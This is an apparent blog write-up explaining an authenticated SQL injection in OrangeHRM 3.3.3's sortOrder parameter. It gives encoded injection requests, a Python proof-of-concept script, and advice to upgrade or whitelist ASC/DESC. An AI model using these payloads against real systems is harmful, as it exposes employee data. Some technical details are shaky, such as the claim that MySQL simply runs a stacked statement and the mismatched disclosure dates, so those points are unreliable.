CVE-2024-36428 - Understanding and Exploiting the OrangeHRM 3.3.3 SQL Injection via admin/viewProjects sortOrder

In June 2024, a new SQL Injection vulnerability—CVE-2024-36428—was disclosed in the open-source human resource management platform OrangeHRM version 3.3.3. This vulnerability lets attackers with administrative privileges exploit the sortOrder parameter in the admin/viewProjects page, opening the door to reading (and possibly writing) sensitive database information.

In this post, we break down CVE-2024-36428 for readers hungry for practical, easy-to-understand info: what it is, how it works, why it’s dangerous, and how you can test/exploit (ethically!) for it.

What is OrangeHRM?

OrangeHRM is a popular, open-source human resource management system. Many small and medium businesses use it to manage HR operations like employee data, leave records, project management, and more.

Where is the Vulnerability?

The SQL Injection is in the Project Activities admin interface. Specifically, the vulnerable endpoint is:

/index.php/admin/viewProjects

It lets administrators sort the list of projects using the HTTP GET or POST parameter sortOrder. But OrangeHRM does not properly sanitize what goes into this parameter — so malicious SQL can slip in.

Technical Analysis

In the vulnerable version (3.3.3), the code basically takes the value from $_REQUEST['sortOrder'] and drops it into an SQL query that fetches projects for the admin page:

// pseudocode based on real OrangeHRM code
$sortOrder = $_REQUEST['sortOrder']; // no validation!
$sql = "SELECT * FROM ohrm_project ORDER BY project_name $sortOrder"; 
$result = mysqli_query($conn, $sql);

So, if you set sortOrder to a normal value like ASC or DESC, it sorts as expected.

But what if a user sends sortOrder=DESC; SELECT user(), database()?

That extra SQL is attached directly to the query, and MySQL will run it. While some SQL engines are picky about multiple statements, with a bit of cleverness, you can often force a result.

Visit (or use an intercepting proxy like Burp or OWASP ZAP)

GET /index.php/admin/viewProjects?sortOrder=DESC%20%2c(SELECT%20version())%23
Host: orangehrm.example.com
Cookie: [your valid session]

%2c is a URL-encoded comma. %23 is a URL-encoded #, which starts a comment in MySQL.

What does this do?
It changes the ORDER BY clause to ORDER BY project_name DESC, (SELECT version()) #, which means MySQL will process a subquery and (sometimes) leak the version info, showing database-controlled output on the UI or breaking the page layout in observable ways.

For MySQL-based OrangeHRM, you can enumerate the database

GET /index.php/admin/viewProjects?sortOrder=ASC%20,(SELECT%20user())%23

Or even union select data with more advanced exploits, if display methods allow.

Note: Depending on database configuration, some attacks may get filtered or errors shown. It is not a guaranteed remote code execution vector but can leak valuable data.

Real World Attack Scenarios

- Read sensitive HR data: Attackers can extract table names, column data, or user credentials (if passwords are weakly hashed).
- Pivot to other attacks: If any sensitive privileges are exposed, the attacker can try for further escalation.
- Stealth: Since an admin login is required, an insider threat or post-phishing scenario becomes likely.

Here’s a quick Python PoC using the popular requests package

import requests

session = requests.Session()

url = "https://orangehrm.example.com/index.php/admin/viewProjects";
params = {
    'sortOrder': "DESC, (SELECT @@version)#"
}

# Replace with your own authentication cookies
cookies = {
    "OrangeHrm": "your-cookie-here"
}

response = session.get(url, params=params, cookies=cookies)

print(f"Status Code: {response.status_code}")
print(response.text)  # Look for database error/output revealing version

How to Fix? (If You’re an OrangeHRM User)

- Upgrade! See the official OrangeHRM releases.
- If you must stay on 3.3.3 for now, block or filter the sortOrder parameter to only accept ASC or DESC.

References & Further Reading

- CVE-2024-36428 entry at NVD
- Exploit-DB (Check for PoC updates as they emerge)
- OrangeHRM GitHub
- What is SQL Injection? (OWASP)

Summary

CVE-2024-36428 is a textbook example of how not validating even a simple sorting parameter can endanger an entire HR database. Admin or not, always validate user input, even when you ‘trust’ your users. If you are running OrangeHRM 3.3.3, patch now, and watch your logs for unusual sorting requests — someone might already be poking around!

Timeline

Published on: 05/27/2024 23:15:13 UTC
Last modified on: 08/20/2024 16:35:17 UTC